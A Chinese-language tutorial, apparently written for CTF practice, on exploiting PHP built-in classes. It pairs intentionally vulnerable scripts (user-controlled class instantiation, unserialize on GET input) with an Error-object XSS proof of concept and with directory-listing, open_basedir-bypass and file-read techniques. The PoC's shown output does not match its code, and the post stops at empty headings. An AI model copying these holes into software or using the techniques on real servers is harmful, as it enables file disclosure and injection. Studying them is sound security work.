php原生类及其利用

本文最后更新于:1 年前

PHP原生类

异常原生类

error:(PHP7,8)

Exception:(PHP5,7,8)

1
2
3
4
5
6
7
8
9
10
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];

    $a = new Error($dir);

    echo $a;
}

那,既然这样,那我有个大胆的想法。。

1
2
3
4
5
6
7
8
9
10
11
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];
    $class = $_GET['class'];

    $a = new $class($dir);

    echo $a;
}

当然通常环境下,开发者通常也不会在程序内留下可控的创建新类对象,可能会有以下的情况:

1
2
3
4
5
6
7
8
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];
    $a = unserialize($dir);
    echo $a;
}

这时候我们编写poc:

1
2
3
4
5
6
<?php
$a = new Error("<?php phpinfo();?>");
$b = serialize($a);
echo urlencode($b);
//输出:
/*O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A36%3A%22C%3A%5CUsers%5Clinfe%5CDesktop%5Cclass%5Cser.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D*/

原生类读取目录:

DirectoryIterator:(PHP5,7,8)

读取目录下单个文件(目录)名,若需要全部打印出来要循环

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];

    $a = new FilesystemIterator($dir);

    foreach($a as $f){
        echo($f->__toString().'<br>');
    }
}

FilesystemIterator:(PHP 5>=5.3,7,8,DirectoryIterator的子类)

DirectoryIteratorFilesystemIterator均有一个__toString()方法,将获取的结果转为字符串

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];

    $a = new DirectoryIterator($dir);

    foreach($a as $f){
        echo($f->__toString().'<br>');
    }
}

结合glob://伪协议可绕过open_basedir的限制:

GlobIterator:(PHP 5>=5.3,7,8)

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];

    $a = new GlobIterator($dir);

    foreach($a as $f){
        echo($f->__toString().'<br>');
    }
}

读取文件:

SplFileObject:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);

if($_GET['dir']){
    $dir = $_GET['dir'];

    $a = new SplFileObject($dir);

    foreach($a as $f){
        echo($f);
    }
}

SoapClient:

ReflectionMethod: